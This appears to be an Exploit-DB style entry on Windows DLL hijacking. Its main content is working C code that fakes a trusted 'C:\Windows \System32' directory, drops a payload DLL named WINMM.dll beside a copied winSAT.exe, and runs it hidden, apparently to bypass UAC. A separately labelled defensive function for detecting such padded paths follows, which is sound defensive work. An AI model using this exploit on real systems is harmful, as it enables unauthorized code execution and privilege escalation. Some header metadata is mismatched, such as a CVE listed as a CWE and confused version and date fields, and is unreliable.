vendor: Windows 7
by: Unknown
CVSS: 8.8 HIGH
DLL Hijacking
CWE: 427
Product Name: Windows 7
Affected Version From: Windows 7
Affected Version To: Windows 10
Patch Exists: YES
Related CWE: CVE-2010-2568
CPE: o:microsoft:windows_7
Other Scripts: N/A
Platforms Tested: Windows
2010

DLL Hijacking Vulnerability

DLL hijacking is a type of vulnerability that can be exploited by attackers to execute malicious code on a target system. It occurs when an application looks for a specific DLL to run a certain task, but an attacker provides a malicious DLL instead. This malicious DLL is then executed on the target system, allowing the attacker to gain control of the system. The vulnerability was first discovered in 2010 and affects Windows systems.

Mitigation:

To mitigate DLL hijacking, organizations should ensure that all applications are running with the latest security patches and that all DLLs are properly signed.

Exploit-DB raw data:

#include "stdafx.h"
#include <Windows.h>
#include "resource.h"

void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) {
	HMODULE hMod = GetModuleHandle(NULL);
	HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName);
	DWORD dllSize = SizeofResource(hMod, res);
	void* dllBuff = LoadResource(hMod, res);
	HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
	DWORD sizeOut;
	WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
	CloseHandle(hDll);
}

int main()
{
	_SHELLEXECUTEINFOW se = {};
	//Create Mock SystemRoot Directory
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
	CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false);

	//Drop our dll for hijack
	DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");

	//Execute our winSAT.exe copy from fake trusted directory
	se.cbSize = sizeof(_SHELLEXECUTEINFOW);
	se.lpFile =  L"C:\\Windows \\System32\\winSAT.exe";
	se.lpParameters = L"formal";
	se.nShow = SW_HIDE;
	se.hwnd = NULL;
	se.lpDirectory = NULL;
	ShellExecuteEx(&se);

	return 0;
}
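
A defensive check for the technique in the code above, added here as an example and not part of the original Exploit-DB entry: the code stages its files under `C:\Windows \System32` (with a space after `Windows`), which its comments call a fake trusted directory. The function below flags any path that has a component ending in spaces or dots and that lands under a trusted root once those are trimmed, so it can be run over process-creation or image-load paths. The function name, the trusted root list and the sample path are assumptions constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Trusted roots to compare against (assumed list for this example). */
static const char *TRUSTED_ROOTS[] = { "C:\\Windows", "C:\\Program Files" };

/* Case-insensitive comparison of the first n bytes of a and b. */
static int ieq_n(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Returns 1 if a component of `path` ends in spaces/dots and the trimmed path
 * falls under a trusted root, 0 if not, -1 if the path exceeds the buffer. */
int is_mock_trusted_path(const char *path) {
    char norm[520];
    size_t n = 0, start = 0;   /* start = offset of the current component */
    int padded = 0;

    if (strncmp(path, "\\\\?\\", 4) == 0) path += 4;   /* drop \\?\ prefix */
    for (;; path++) {
        if (*path == '\\' || *path == '/' || *path == '\0') {
            /* Component ended: trim trailing ' ' and '.', but leave
             * components made only of them ("." and "..") untouched. */
            size_t e = n;
            while (e > start && (norm[e - 1] == ' ' || norm[e - 1] == '.')) e--;
            if (e > start && e < n) { n = e; padded = 1; }
            if (*path == '\0') break;
        }
        if (n + 1 >= sizeof norm) return -1;
        norm[n++] = (*path == '/') ? '\\' : *path;
        if (norm[n - 1] == '\\') start = n;
    }
    norm[n] = '\0';
    if (!padded) return 0;
    for (size_t i = 0; i < sizeof TRUSTED_ROOTS / sizeof *TRUSTED_ROOTS; i++) {
        size_t len = strlen(TRUSTED_ROOTS[i]);
        if (n >= len && ieq_n(norm, TRUSTED_ROOTS[i], len) &&
            (norm[len] == '\\' || norm[len] == '\0'))
            return 1;
    }
    return 0;
}

int main(void) {
    const char *p = "C:\\Windows \\System32\\winSAT.exe"; /* constructed sample */
    printf("%s -> %d\n", p, is_mock_trusted_path(p));
    return 0;
}
```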